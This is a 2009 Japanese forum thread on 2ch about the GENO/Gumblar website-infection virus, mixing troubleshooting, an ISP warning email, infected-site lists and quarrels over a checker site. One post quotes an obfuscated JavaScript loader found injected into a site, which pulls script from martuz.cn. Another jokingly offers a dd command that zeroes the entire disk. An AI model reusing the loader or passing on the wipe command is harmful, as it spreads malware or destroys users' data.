>>548 復元ポイントを作成しない設定にすれば消せますので、そんな心配いらんだろ。
くだらない書込みでageてんじゃねーよ。
>>546 そそ、リスク完全ゼロを目指すそうとすると大掛かりな作業になるけど、
リスクと手間暇時間を天秤にかけて、手軽な方法で博打に出るわけだ
現在感染状態で、運が良ければ回復、運が悪くても感染状態に戻るだけ
だったらあれこれ悩むより、とりあえず勝負をかけたほうが楽だよな
チェッカーやったら尼が104%だったんだが… 対策してありゃ大丈夫かねぇ?
555 :
名無しさん@お腹いっぱい。 :2009/05/24(日) 16:28:08
ここの連中が騒ぎすぎなだけです
上の流れ見てると、最近のウイルスって持ち主にも感染するみたいだな これからはデータだけでなく持ち主も完全に破棄しないと
SA★TSU★GA★Iですね分かります。
チェッカー自体があんまり信憑性ない(騒ぎに乗じてアフィで稼ごうとしただけな)ので、気にするだけ損です。 対策してありゃ大丈夫だし、今は、本体配布元は死んでるし、気になるなら先にソースを見とけ。
>>550 広義のウイルスでよければ、画像ファイルや圧縮ファイルなんかのデータファイルも存在するけどな
>>49 IPAに通報済み
あと、メールフォームがあったからそこから送ってみた
>>559 ソースではどの部分の記述で判定すればいいのでしょうか?
563 :
名無しさん@お腹いっぱい。 :2009/05/24(日) 16:52:27
>>554 スクリプトだらけならそれぐらいの数字すぐ出る
感染サイトは1000パーセントぐらいはじき出すし
564 :
名無しさん@お腹いっぱい。 :2009/05/24(日) 17:03:53
ウイルス対策でadobe readerの最新版をダウンロードしたんだけど、 デスクトップに出来た「AdbeRdrUpd911_all_incr.msp」ってパソコンマークみたいなやつは、 一回クリックしてインストール完了したらゴミ箱にすてちゃっていいの? ずっとおいとかなきゃダメ??
レス遅くなってすみません。
>>550 >>551 どうもありがとうございました。
>>553 ありがとうございます、勉強になりました。
回答してくださった方どうもありがとうございました。
>>565 ありがとうございます
参考にさせて頂きます
やはり、GENOチェッカーより自力で確認した方が確実ですね
>>3 Adobe Acrobat ReaderとAdobe Readerはバージョンが上がって名前が変わっただけですよね?
>>392 ゲストのネットワークをNAT接続かHost onlyにしてサブネットを分ければいい
ブリッジ接続だとヤバいな
GENOTシャツ
GENOウイルス専用駆除ツールさっさと出せよ
リカバリはCドライブだけで大丈夫? Dドライブは初心者にはいじり辛そうなんだけど
MalwarebytesかHijackthisでできるだろ 分からないならクリーンインストールでいいよ ネ板で変なexe作ってた人たちがいたけど
じゃぁ DD for Windows をc:\dd.exe において c:\>dd if=/dev/zero of=\\?\Device\Harddisk0\Partition0 bs=1M これであっという間にゼロクリアしてくれる。
面白いと思って書いたの?
すっかりGENOウイルスという名前で定着してるけど、 そもそもGENOの管理者がZolkonにやられてたってこと? でもって、今GENOウイルスを放置してると、 次の亜種が出たときに真っ先に被害者(加害者?)になり得るってこと? そこらへんkwsk
もはや由来も知らずに 「GENOウイルス」って名前だけ広まってる状態だよ 「Genocideウイルスの短縮形」みたいな誤解釈も
>584 GenoSiteういるす、通称ジェノウィル
でもジャノサイドはごろあうしなーw
>>584 でも、由来をしらなくて店名だと知ると
その店が何か悪いことしていると
考える人もいる。
今回の騒動でオレの中では、「ふくぜんウイルス」で定着した。
>>588 そう感じる人も出てくるだろうね
利用歴ある俺としては残念だけどさ
592 :
名無しさん@お腹いっぱい。 :2009/05/24(日) 20:19:35
流れ切ってスマン GENOウイルスってDtoD領域に感染しにくい物? 簡単に感染する? PC中古で買ったんで素人知識しか無くってGENOの存在最近知って
<script language=javascript><!-- (function(){var u930=':76ar:20a:3d:22Scr:69:70:74Eng:69ne:22:2cb:3d:22 Version:28:29+:22:2cj:3d:22:22:2cu:3dn:61vi:67a:74or:2euser:41:67en:74:3bi:66:28 (u:2e:69:6edexOf:28:22C:68rome:22):3c0):26:26(u:2ein:64:65xOf:28:22Win:22:29:3e0) :26:26:28u:2e:69n:64exOf(:22N:54:20:36:22):3c0):26:26(d:6fcum:65nt:2ecoo:6b:69:65 :2e:69:6e:64exOf:28:22m:69ek:3d:31:22):3c0):26:26(typeof:28zr:76zt:73):21:3dt:79peo :66(:22A:22))):7bzr:76zts:3d:22A:22:3beval(:22if(w:69n:64ow:2e:22:2ba+:22:29j:3dj+: 22+a+:22Ma:6aor:22+b+a+:22:4din:6fr:22+b+a+:22Bui:6c:64:22+:62+:22j:3b:22) :3bdocument:2ewrite(:22:3cscript:20s:72:63:3d:2f:2f:6dar:22+:22tuz:2ecn:2fv:69d: 2f:3fid:3d:22+:6a+:22:3e:3c:5c:2fscript:3e:22):3b:7d';var ED9=u930.replace(/:/g,'%') var dd1=unescape(ED9);eval(dd1)})(); --></script> テキトーなとこで改行したけどこれってGENOだよね??
>>592 少なくともGENOウイルスではDtoD領域を弄っていると言う報告は聞いたことが無い
中古だと別のウイルスに感染してたり変な細工されている可能性もあるがね
595 :
名無しさん@お腹いっぱい。 :2009/05/24(日) 20:34:25
PC来たら、ネット繋げる前に GENOチェック ウイルスソフト入れてスキャン これで平気ならとりあえず問題無しでおK? 他に問題有る?
ウイルスは入れちゃ駄目だろ
HDD入れ替えれば良いじゃない どうせ中古HDDなんていつまで持つかわかんないんだし
ふくぜんブログのコメントが賑わって来た
>>593 GENOっぽいね
martuzcnが見えた
中古PCとか勘弁だなあ パーツの交換ができるデスクトップならまだしも 換えの効かないパーツが多いノートではファンが劣化してたりとか考えるとなー 修理に出す手間や費用考えたら新品の方が格段に良い
最近は、新品のUSBメモリ挿しただけで感染って事例もあるからな
>>602 USBメモリ刺しただけで自動実行とか馬鹿にも程がある仕組み考えた奴は今頃何してんのかな・・・
604 :
名無しさん@お腹いっぱい。 :2009/05/24(日) 20:52:50
スマン言葉足りんかった; ウイルスセキュリティソフトの間違い 新規HDDまでは資金的に厳しいから、とりあえず仕込まれてなければ壊れるまで頑張るつもり
GENOコナーズ
仕込まれてるのが判らないように巧妙に潜伏して情報を抜き取るのが今時のウイルスです 利用者を脅かしたり嫌がらせが主な目的の昔のウイルスみたいに 素人にも存在をアピールしまくるのは今ではもう稀だろ
アピールしまくったせいでこうなった
子供のころに世界不思議発見かなんかで見たコンピュータウィルス特集に 画面にパックマンが現れてデータ消してくとかあったなw 子供のころはすげーって思ったが今にして思えば製作者は何がしたかったのかと
avastで確認したらマルウェアが検出されましたって出たんですけれども クリーンインストールですか
610 :
名無しさん@お腹いっぱい。 :2009/05/24(日) 21:17:34
乙
精神的にやられてるならクリーンインストールしたほうが心の為になると思わない?
都会では 感染する 若者が 増えている 今朝きた 新聞の 片隅に 書いていた だけども 問題は インフルエンザ マスクがない
>>588 悪いことしているというより悪い事をしたんだけどな
617 :
名無しさん@お腹いっぱい。 :2009/05/24(日) 21:48:43
>>613 なんで.batと.cmdだけ阻止なんだろ。次の亜種はVBScriptでもひっさげてくるのか?
さっきabode使ってたら 調査の協力をお願いします見たいのが出てきて それを承諾してしばらくしたら突然Windowsに必要なファイルが見つかりません見たいな警告が出てきた 気になってcmdやってみたら見つかりません sqlsodbcもファイル自体発見できず 再起動してみたら必要なファイルがない為起動できませんってなった ノートンのおかげで復帰できたけど GENOと関係あるのかな・・・ ないにしろビックリした
>>618 おちつけ
それと環境と前後の状況をかくんだ
騒ぎすぎ 不安を煽り立てるのが上手な方たちですね。
DaonolFix を含むURL作って踏めば駆除できるやん
感染したサイトが一時閉鎖すればいいだけだろ ばらまくなよ
一番古い感染報告は、いつ頃? オレはsqlsodbc.chmが書き換えられた日付が3月21日だったけど
亜種はcmd.exe起動するってほんと?
「ふくぜん」はなんだかんだで対処したのでエライですね。 以下、完全放置を決込んでるツワモノ。。。 *感染注意* www.ti-a-ra.com www1.odn.ne.jp/revue1999 www.k-q-bury.com
>>625 日付についてはどうとでもなるのでサイズで確認推奨
>>626 起動したのもあったとおもう
不完全だったのか亜種だったのか不明
パソコンなんて使わなきゃいいんだよ 電話とファクシミリで十分
>>627 感染率1000%・・・
今のところあるセキュリティソフトの中で一番対応がしっかりしてて
ウイルスの駆除や情報、解析がしっかりしてるのってどれなんだ・・・
>>620 この板も強制ID導入したほうがいいかもな。
>>631 騒ぎがあるたびに乗り換えてたらキリがないよ
ある程度のソフトが対応できてきてるし
いま使ってるやつが期限切れてないならそれでおk
セキュリティソフトを過信するよりも他の対策方法があるんだから
そういうのをしっかりやりましょう
Genoに限らずOSや各種ソフトの更新はセキュリティ対策として基本的なことだよ
Geno対策についてはスレの上のほうも見てね
ID導入で廃れるな 間違いない
自作自演はある程度難しくなりますねw
フシアナすればID見れるんだな
>>627 2番目は放置決め込んでる管理者よりODNに消させたほうが早いだろ
>>627 一番上:5/16にメール済み。開封確認届いていない。サーバー業者abuse行きかな。
二番目:5/16にメールしたのが読まれていない模様。サーバー業者のabuseに投げとくわ。
三番目:5/21にメール 15:15に、HP管理会社に問い合わせ中との返答あり。対応中。(多分、週明けに動く?)
>>640 「サロン情報リスト」の中の人とは別の方ですね?
お疲れ様です。
genolists.alink.uic.to
こちらもまだまだ放置多いみたいですね。
>>641 はいの、別人です。リストに載ってるものはあらかたチェックしてメールした…筈。
>627の上2件、サーバー業者abuse または 技術管理担当者 宛に報告完了。
ふくぜんに返答コメントがついてた
>>644 ニコニコの偽者っぽいやつは中国のマルウェア配布サイト
646 :
名無しさん@お腹いっぱい。 :2009/05/25(月) 02:38:52
jpgの女は殺られたね かわいそうに
寝るか
>>613 よく考えたらその通りだな
まあ安心したいならregコマンド実行してみてくれつーことで
DaonolFix落として実行したほうが分かりやすくて早いんだけどな
649 :
名無しさん@お腹いっぱい。 :2009/05/25(月) 10:04:25
これMSが作ったんじゃねーか?Vista売るために。
これM$が作ったんじゃねーか?7売るために。
いや直ってるだろ サイトマップから全てのページのソース見たけど怪しい記述はなかった jsの中も改ざんされてないし googleに頼る前にソース見ろよ
ヤフオク自体は感染してないけど
GUITAR CRAFT(guitarcraft.jp)ってサイトが感染しててそれをgoogleが危険と判断
>>653 ではそのguitarcraft.jpから画像を読み込もうとしてるから「大丈夫?怪しくない?」ってchromeが警告出してる状態
>>653 自体は踏んでも問題ないけどリンク先は保証しないよ
コロンブスへは誰か連絡したの?まだ直ってないよ。
ちょっと時間かかるよ
>>649 ありうる
作って得する奴が作ったんだろうね
【Gumblar (通称 GENOウイルス)】にご注意を
ベクターPCショップ??対策別セキュリティソフトの選び方
http://shop.vector.co.jp/service/special/security/ 現在、「Gumblar」(GENOウイルス、JSRedir-Rとも表記)が急速に蔓延しています。
これはFlashやPDFビューアのプラグインの脆弱性をついて感染する新種の「トロイの木馬」です。
Webサイトを参照しただけで感染する悪質なウイルスのため、一般のユーザーでも警戒が必要です。
また、サイト管理者の方のパソコンがこのウイルスに感染すると、入手したパスワードからサイトを改変します。
このサイトにアクセスすると、別サイトからウイルスやスパイウェアなどをダウンロードさせます。
■感染した場合の影響
・sqlsodbc.chmを改変
・レジストリエディタ、コマンドプロンプトが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(WindowsUpdate、ウイルス対策ソフト関連サイトなど)
・ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄
・explorer.exeや一部のブラウザが異常終了
・PDFファイルやシステムファイルが増殖
・パソコンの動作が重くなる
詳細な情報は、各ウイルス対策ソフトメーカーのWebサイト等でご確認ください。
BIGLOBEからメール来てて驚いた ちゃんと対策とれよと書いてた
sqlsodbc.chmを改変されてないけどGENOっぽいのにやられた Windowsと一緒にヘルプファイルの大量起動&肥大化 今スキャン中っていうかOneCare仕事しろ
亜種?
それ、ただのブラクラなんじゃ?
>>663 いや起動と同時にヘルプファイルがガンガン開き始めて400くらいまでいったんだが
ブラクラで通常終了後、起動と同時に仕掛ける時限式なんてあるのかな
ブラウジングなんてJaneで2ちゃんしか開いて無いぞ
あとGENOチェッカーで昨晩踏んだ疑わしいサイト(エロ同人系)
かけてもせいぜい危険度34%程度だった
>>660 こぴぺよろ
メルアドとか名前とかは消していいから
どれ?
>>664 > ブラウジングなんてJaneで2ちゃんしか開いて無いぞ
> あとGENOチェッカーで昨晩踏んだ疑わしいサイト(エロ同人系)
矛盾してね?
チェッカーで見ただけなのかブラウザで見たのかどっちですか?
それ以外もエロサイト行ってるならそのへんが原因だとおもう
>>667 ああごめんちょっと書き方がまずかったね
昨晩エロ同人系一ヶ所だけ見て何事も無く終了
けさPC起動してJane立ち上げてるとヘルプファイル大量起動に気付く
とりあえずタスクマネージャで一掃
もしやと思いそのエロ同人サイトをチェッカーにかけてもはっきりとした判定は出ず
ってこと、同人系は本当にそこしか行って無いし
さっきから履歴見て他一般系も調べてるけど今のとこ反応出ない
先ずそのリンクを晴
え、自分もjane大量に立ち上がることあるがウイルスなのか? 単なるバグかと思ってたが
あいよ、ここしか行ってないのは確か http:■■samurai3.net■ しかしID無いと不便だな
>>665 BIGLOBEの会員全員に送られてるメールだよ
内容はたしかアドビ製品の更新とウィルス対策ソフトを入れろってやつ
>>671 すくなくとも、現時点ではGENO呼び出しは入ってないようだ。
674 :
名無しさん@お腹いっぱい。 :2009/05/25(月) 14:49:47
adobeとMSにまず呼び出しするべきだな GENO呼んでも対策にならん
えっ?
>>668 二行目ではさも1サイトしか閲覧してないようなことをいってるのに
最後の行では他も行ってそうなことをほのめかしてるんだが
何でそんなに情報隠蔽して小出しなの?
Geno感染は同人系サイトだけじゃないよ
あとチェッカーじゃなくてソース見てくれ
>>671 は問題なさそう
スキャン結果も出たらkwsk
>>668 HELPファイルの大量起動:少なくともGENOではない。
なにかのファイルを多数開いてPCをクラッシュさせるブラクラは、マルウェア(ウイルス)ちゃいます。
もっかいPC再起動して、同じ症状が出るか確認。スタートアップに変なものいないか確認。
チェッカーは凄く役立つけど過信しすぎるのは...
余計なこと言うな 適当にほめとけ
チェッカーの人、定期的にν速で適当なGENOスレ建てて宣伝してるね
アフィで必死なんだろう。生暖かく見守ってやろうぜ。自分に影響ない箇所でやってる分には。
>>681 そういうこと書くと「セキュ板の民度が〜」「レベル低い」
って言い出すからやめとけ
うちも 他板で聞いてもバカとかいわれたし 知らないくせにでしゃばんじゃねーよって感じ しょせんキモヲタ(笑)
GENOチェッカーについて都合の悪い書き込みがある。 ↓ 「セキュリティ板はレベルが低い。有用な情報書き込むつもりだったけどやめました。」と 他の板のスレに書き込み始める。
アンチの自演が始まったってレスがつくぞ
あの人の話題はやめてくれ 空気悪くなるから
アフィのやつはageるからわかりやすかったのにな 黙ってりゃよかったのに
誤認定ハ消ソウト思エバ一瞬デ消セマスヨ。 万ガ一亜種ガ出タ時ノコトヲ考エテ、余剰処理ヲ残シテアルンデス。 ゴリゴリ大好キサンナラ、ソースヲ読ミ込マセテ外部JSノURLヲ出力スルヤツクラハイ
アフィ野郎も死ね
ageなくても文体でわかるが
あたしのためにケンカするのはやめて!
じゃあ、あしたのためにケンカする!
かっこつけやがって・・・
これでいいんだ……これで
アフィ、チェッカーをNG登録完了 荒らすなよ
697 :
名無しさん@お腹いっぱい。 :2009/05/25(月) 15:37:26
/ ̄ ̄ ヽ, 喧嘩をやめゅてぇ〜♪ / 丶 / ', ノ//, {゚} /¨`ヽ {゚} ,ミヽ アンチをとゅめてぇ〜♪ / く l ヽ._.イl , ゝ \ .ni 7 / /⌒ リ ヘ_/ノ ' ⌒\ \ l^l | | l ,/) (  ̄ ̄⌒ ⌒ ̄ _) ', U ! レ' / / ̄ ̄ ヽ, ` ̄ ̄`ヽ /´ ̄ / 〈 / ', .n .| ・ ・ | ヽっ{゚} /¨`ヽ {゚}, l^l.| | /)ノ | /´ ̄ ̄ .l ヽ._.イl ', | U レ'//) ノ / ィ-r--ノ ヘ_/ノ ', ノ / ∠_ ,/ ヽ rニ | f\ ノ  ̄`丶. 丿' ヽ、 `ヽ l | ヽ__ノー─-- 、_ ) . !/ ヽ、 | | | / / / !jl |ノ ,' / .l l | | ,' .| ・ 丶 ヽ | / ! ア!、, | | ,ノ 〈 ./ ・ ./' ( ヽ_____ノ ヽ.__ \ / ヽ._> \__)
>>665 貼ろうと思ったけど本文長すぎっていわれたー
分けて貼るの面倒くさいしー
>>698 画像でうpしてみるのは?
キャプったあとに名前とか修正してうp
テキストも画像もうpは面倒くさいー
また荒らしが来てる気がする
「【重要】ホームページ改ざん防止のため今すぐ対策をお願いします」って件名のメールだったら来たけど。
それの話?5月22日に送られてきた。
>>672 も書いてる通り。そしてFTPのパスワードは定期的に変更して下さいっていうことも書いてある。
もう感染してたらパスワード変えたって意味ないよな
2009年5月22日 BIGLOBE個人ホームページを ご利用のみなさま NECビッグローブ株式会社 BIGLOBEカスタマーサポート ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 【重要】ホームページ改ざん防止のため今すぐ対策をお願いします ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ※このメールは大切なお知らせのため、5月20日現在BIGLOBE個人ホームページ を契約中のお客様全員にお送りしています。 平素より弊社のBIGLOBEサービスをご利用いただき、誠にありがとうござい ます。 現在、ウイルス感染によりホームページが改ざんされる事例が多数報告され ています。 この改ざんされたホームページを閲覧するだけで、パソコンがウイルスに感 染する可能性があります。 感染は、パソコンにあるAdobe ReaderやAdobe Acrobat、Adobe Flashの脆弱 (ぜいじゃく)性を利用して行われます。 ウイルスに感染すると、お客様が個人ホームページをアップロードする際に 用いるFTPアカウントおよびFTPパスワードが盗まれた上に、お客様のホーム ページが改ざんされてしまう可能性があります。 お客様の大切なホームページが感染被害にあったり、感染および改ざんに よってお客様ご自身が感染の加害者となったりする可能性を低くするため に以下の対策をすぐに行ってください。
---------------------------------------------------------------------
◆ウイルス感染する可能性のあるシステム
---------------------------------------------------------------------
- Adobe Reader/Acrobat 9.1 およびそれ以前のバージョン
- Adobe Flash Player 10.0.12.36 およびそれ以前のバージョン
---------------------------------------------------------------------
◆対策
---------------------------------------------------------------------
1.Adobe製品を最新版にアップデートする
1-1. Adobe Reader および Acrobat を最新版(9.1.1以降)にアップ
デートする
■最新バージョンのAdobe Readerのダウンロード
http://get.adobe.com/jp/reader ※上記インストール後、Adobe Reader を起動して
「ヘルプ」→「アップデートの有無をチェック」を選び、
最新版(9.1.1)にアップデートしてください。
なお、新規インストール時は9.1版であり、最新版ではない
のでご注意ください(2009年5月20日時点)。
1-2. Adobe Flash Player を最新版にアップデートする
■Adobe Flash Playerのインストール
http://get.adobe.com/jp/flashplayer/
さらに、このウイルスに感染する可能性を低くするためには次の対策も実施
してください。
2.ウイルス対策ソフトを導入、または最新版にアップデートする
ウイルス対策ソフトをまだ導入されていない場合は速やかに導入し、
すでに導入済みの場合は最新版にアップデートしてください。
なお、ウイルス対策ソフトを導入する際には、BIGLOBEの「セキュリ
ティセット・プレミアム」をご検討ください。
■「セキュリティセット・プレミアム」
http://security.biglobe.ne.jp/set/premium.html 3.FTPパスワードを変更する
■管理画面へのログイン
http://homepage.biglobe.ne.jp/kanri/ ※FTPパスワードは定期的に変更してください。
---------------------------------------------------------------------
◆参考情報
---------------------------------------------------------------------
■ JPCERT コーディネーションセンター からの注意喚起
http://www.jpcert.or.jp/at/ 今後ともBIGLOBEをご愛顧賜りますよう、よろしくお願いいたします。
え?改竄してるウイルスもGENOウイルスなの? それはソース無くね?
とりあえずはったぞ
別に貼らなくても良かったです
712 :
名無しさん@お腹いっぱい。 :2009/05/25(月) 16:15:41
次スレでは
>>5 のサイト載せるんじゃねえぞ
アフィ見るぐらいなら感染した方がよっぽどマシだ
じゃどこか感染するサイトを載せるようにすればいいのか?
↑こいつ最高にあほ
アフィ叩きしてる俺たち、すごい一体感を感じる!
194 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/23(土) 17:51:18 チェッカー叩きする俺たちカッコイイ!
半角カナ 17 名前:192.168.0.774[] 投稿日:2009/05/23(土) 13:53:57 ID:Hx9+/5Qd0 なんだよ ID:F81SI+Tt0=ID:ta6edS2L0 かよww 必死ダナーwww
俺的にはアフィを使うのはまだ許せるが チェッカー自体が既に役立たずのゴミなのが許せん 次スレにリンク貼って欲しかったら改善しろよ
>>294 にも出てきて無いし名無しに戻ったのか
低スキルが目立とうとするとこの様ですよ
他人に書いてもらったスクリプトの言語が違うから書き直せとか
恥ずかしすぎる死んでくれ
次スレいらない雰囲気 ニュー速見てきたらスレなかったしもういいんじゃないか
とりあえずチェッカー自体どうでもいいんだが
>>1 にあるテンプレを書き換えてチェッカーのURLだけにした奴はひどいと思った
別にいいんじゃね テンプレ糞だし
724 :
名無しさん@お腹いっぱい。 :2009/05/25(月) 17:05:08
技術もなにもないやつがグズグズ文句垂れ流してウザすぎる
ぐすん・・・
チェッカー馬鹿にしてるけど結局オマエラ使ってるんだろ? 文句言うなや
まぁ、今は特にネタないしな
ソース見ちゃうからチェッカーしらないんだよなあ
Windowsヘルプファイルが大量に出てクラッシュしかけた者だが OneCareによるフルスキャン完了、何にもなし それで再起動したんだが今度は特に不具合出てはいない 何だったのあれ
やっぱウイルスコードって響きがいかんのかもね
ダヴィンチコード
>>733 やばいとおもうならやばいんじゃね
いろいろ調べてセキュリティ対策してね
感染サイトリスト見たけどずいぶん増えてるな
感染サイトリストってso-netの?
このウィルスを作った人物ってどこの人かわかっているの? プログラムは技術的に高度なの?
自分で解析しろ
つか、チェッカーの中の人を叩くのは頷けん。 一定の努力やら労力を行使してるのを叩くのは(・A ・) イクナイ! なんでも『批判ありき』ってのはどうかと思うよ。
>>745 みんな分かっているからおkだ
変なのはどこにもいるさ
>>745 自演って言われるからそういうレスもしないが吉
>>745 2chを大半を占める無能ニートや技術無しゆとりなんて、それが生き甲斐なんだから仕方ない
何も出来ない自分と何を出来る他人を比べてどうして様も無く惨めになって
泣きながら叩く姿をあざ笑ってれば良いんだよ。作れる側は
技術もなにもって話
大した出来でもないのに欲出してアフィ貼るから叩かれる クオリティ高けりゃアフィ貼っても絶賛されるだろうよ
と無能がおっしゃっております
なるほど、アフォを貼ったのか
前田五郎休養で坂田師匠大ショック
%の根拠が示されないのはどうかと思う どういう基準で出してるのか不明なので混乱を招くことになる
そろそろ管理人がBe付きで出現しても良い頃合いじゃないか 或いは相手にしてもらえてないか
プロバイダがOCNなんでそのまま無料ホムペ使ってますが、 うpはFTPじゃないとだめなんすねorz ところで、ソースに埋め込まれるのって外部データを読み込む動作ですよね? OCNの無料ホムペって自作CGIとか、拡張子phpもダメなんで、外部のデータ 読み込めないイメージなんだけど、GENOの動作には関係ないですか? 初心者ですみません 以前GENOの症状例か何かで拡張子phpのデータを 見た気がして気になってたもので…
>>757 もうBe付では出てこないんじゃないの
名無しでは湧いてるだろうけど
>>294 これがなければ普通に良い人で終わってたのに
チェッカーの人叩くつもりは全く無いし むしろ凄いって思ってるよ だからセキュ板のこと叩かないでね 他のGENOスレも叩かないでね
この件に限ったことじゃないけど 己の懐が痛むわけでもないのにアフィ撲滅に必死になってる奴の動機がよくわからん だいたい撲滅したいなら尼のほうに抗議すりゃいいのに
>>758 おそらくわけがわからない状態で混乱してると思うんだけど
エスパーするとGenoの動作には関係ないです
html、JavaScript、PHPあたりのファイルにはスクリプトの埋め込みが
確認されていたと思います
自分のPCが心配ならとりあえずスレの上のほうを確認してください
サーバーの転送量がやばいからアフィリエイトつけてんだろが 運用でやらかしたのはGENOとは関係ない
://www.g-b-dog.com/g-b-dog/aloma_erabikata.htm このURLをチェッカーで調べると1000%と出るけどGENOウィルス?
>>764 この件に関しては嫌儲もあるんだろうけど
チェッカーの精度と情報開示に疑問を感じてる人達もいると思うんだが
アフィよりもチェッカーの出来と宣伝スタイルとスキルに疑問を持ってるのですが
そもそも1000%という表記からして厨臭いとおもうんだ
凄いモノを作って下さったのだから 余計なことは言うべきではないと思うのです また多分荒れるから話さないほうがいい。
>>776 荒れるというより荒されるって感じだけどな
778 :
758 :2009/05/26(火) 00:37:37
>>765 ご親切に教えていただいてありがとうございますです。m(__)m
自分のPCはその方法で、自サイトもソース全部確認したので、
今のところは大丈夫だと思うのですが、FTPしか使えない以上は
暫く更新控えようかなと思って
配布元が死んでるそうですが、どんな亜種が出てくるかわからないし
というか、ネットするだけで(悪意の無いお友達サイト見るだけで)
危ないなんて大変な事なのに、全然ニュースにもならないし
知り合いのサイトで突然知ってビックリした次第であります
>>778 横レスでごめん
当方もサイト運営してるけど対策していればサイトの更新しても大丈夫だよ
自分も更新しまくってるから
精度が低かったら叩くという意味がわからん もっといいの作るなりすれば済む話じゃねえの
>>776 チェッカーのページのテンプレ?については有用だと思うしアフィも問題ない
けどチェッカー自体は凄いのか?
亜種への対策として判定条件を緩くするのはいいけど、
せめて判定基準を明示してほしいとは思う
782 :
758 :2009/05/26(火) 00:53:18
>>779 おお、ありがとうございますッ!
何だか知り合いがこぞって更新停止を宣言してるんで、
とりあえず止めるしかないのかって感じでした
PCの状態確認しつつ頑張ってみまふ
チェッカー叩きがこのスレに沿ってるわけでもないけどね
腐女子叩きだとチェッカー叩きだのよく脱線して叩きをするのが大好きな奴がいるんだなあ
話すネタないし〜
流石にもう次スレいらないかもな
でたもう次スレいらない厨
>>781 >判定基準を明示してほしいとは思う
これを管理人に伝えた人はいるのか? おれはソースチェッカーしか使って無いからよくわからんな。
もうfc2は安心?
そんな時のテンプレ回答しとけよ。
>>787 GENO社員乙
>>788 ,791
俺はいつもの人と違う人だぜ
いや、別に次スレ立ててもいいけどこれ以上何を話すんだよ
ろくでもない質問しか来ない予感
378 名前:Socket774[] 投稿日:2009/05/25(月) 14:40:04 ID:Xd8gaLc7
GENOでポイント照会すると、他人のIDが出て来ちゃう(>_<)
381 名前:378[sage] 投稿日:2009/05/25(月) 15:25:46 ID:Xd8gaLc7
>>380 なりすましじゃないよ。
注文照会したら、「注文された商品はありません」ってなってたから、
おかしいって思って、ポイント照会したら、他人のIDがでてきた。
で、会員情報の修正って所をクリックしたら…。
382 名前:Socket774[] 投稿日:2009/05/25(月) 15:33:03 ID:b7/1msFI
ほんとだ。ログインし直しても、他人の名前とIDとポイント獲得歴が出てしまい、
自分の情報が閲覧できないぞ。
383 名前:378[sage] 投稿日:2009/05/25(月) 15:34:19 ID:Xd8gaLc7
>>382 だろ。
自分の個人情報も変えれねーwww
386 名前:Socket774[] 投稿日:2009/05/25(月) 15:52:26 ID:b7/1msFI
他人の情報(氏名・ID・ポイント獲得歴)が丸見えだ〜!
【顧客相手に】GENOを語るスレ24【サイバージェノサイド】
http://pc11.2ch.net/test/read.cgi/jisaku/1239183817/
今
>>794 の1行目が目玉オヤジの声で再生された・・・
憑かれてるんだな。
今北産業
とりあえずもうアンチウイルスソフトで検出可能?(オンライン除く
また倒産すんのか
798 :
名無しさん@お腹いっぱい。 :2009/05/26(火) 01:33:57
今さっきとあるサイトでGENOウイルを踏んでしまいました;; 間違ってボタン押したらぶわああああああってブラウザがたくさんでてきて ビックリしたので電源切ったのですが、もう感染してるのでしょうか・・? ウイルスソフトはなにも反応しませんでした。。 PCはvistaです。。 感染していたらどうなってしまうのでしょうか。。とあるサイトではvistaでは平気? と書いてありましたが心配です。。。
>>798 それはGENOウイルスではなく、ブラクラ(ブラウザクラッシャー)と言います。
単にウィンドウを多量に開くだけのものと、マルウェアを数十個一気に入れさせようとする危険なものがあります。
セキュリティソフトがなんも言わなかったなら、たんに操作不能にさせるだけのブラクラだったのでしょう。
常時、javascriptを切ってるからGENO汚染状態のサイトだろうが平気で踏めるぜ! ・・・・・・・死ぬほど不便だけど
801 :
名無しさん@お腹いっぱい。 :2009/05/26(火) 01:46:54
>>799 ブラクラというものだったんですね!?消しても消しても同じブラウザが
でてきてました。。普通のサイトで誰でも押すような検索ボタンなので
ほんとビックリしました。。
セキュリティソフトは全く反応しませんでした。。
ありがとうございます。個人情報、トロイなど潜んでたらどうしようって
心配だったので安心しました;;
ほんとありがとうございました。
>>801 JS切るだけだと、SWFとかPDFを直で埋め込まれたサイトには無力。
その程度の亜種はゴロゴロしてても不思議じゃないと思うのだが。
・・・というか、ブラウザ自体の脆弱性が落ち着いてきた最近、諸悪の根源はAdobeへと移りつつあるように思う。
基本的に、必要ないサイトではプラグイン自体を無効にすべし。
IEとOperaに関しては、エンジン公式ブラウザの内蔵機能のみでプラグインを一時停止できる。他は知らん。
どこにそういうサイトがあるのか知らないけど
>>800 はたぶんNoScriptだろ
フラッシュもPDFもダウンロードしない
GENOに関してはたまたまAdobeだっただけ もっとも、普及率が高いと思われるから狙われるのだが exploit系のツールはロシア製が多い
ざんぎえふ
>>803 firefoxも使ってるがその時はブラウザ自体のjavaも切ってる
基本、opera使ってるね
pdf readerは抹消済
JavaScriptをJavaと略すなと
ニムダが流行ったときも盛り上がった?
>>807 失礼
firefox上では、flashやsilverlightなども制御できるnoscriptに加えてブラウザ自体のjava scriptも無効にしている
>>802 直で埋め込むとか前処理もできないし難読化もできないしなんか利点あるの
>>810 直に埋め込む、の意味を勘違いしてないか?
最近explorer.exeや一部のブラウザが異常終了があるな・・・やばい
カスペ使ってるからだったりして
OS(XP)を弄り過ぎてるからノートン先生のFWの履歴で exproler.exeがよく怒られているが強制終了はないなぁ
>>811 意味が分からん
embedかobject使うんじゃないの
firefoxってキツネじゃなくてレッサーパンダの俗称なんだぜ 豆知識な
しかしアイコンのキャラもマスコットのフォクすけも 両方しっぽが炎のキツネなんだぜ 小豆知識な
対策も出来ないで同じ事繰り返して何してるの?
821 :
802 :2009/05/26(火) 11:06:50
>>810 前処理に関しては、Apache側の設定ファイルが弄れる場合限定だが、UAで振り分けできなくもなかったはず。
難読化はJSカットユーザ攻撃とのトレードオフ
というかそもそも、Adobe製プラグインに警戒すべしってのは現行GENOに限定した話で言ったわけではないつもり。
ど素人が気づけて、リバースエンジニアリングでも楽に直せる程度のバグがメジャーバージョンが2あがっても放置されっぱなしの企業なんで信用できない。
>>811 >>815 自分の書いた直で埋めるってのはembedやobjectで合ってる。
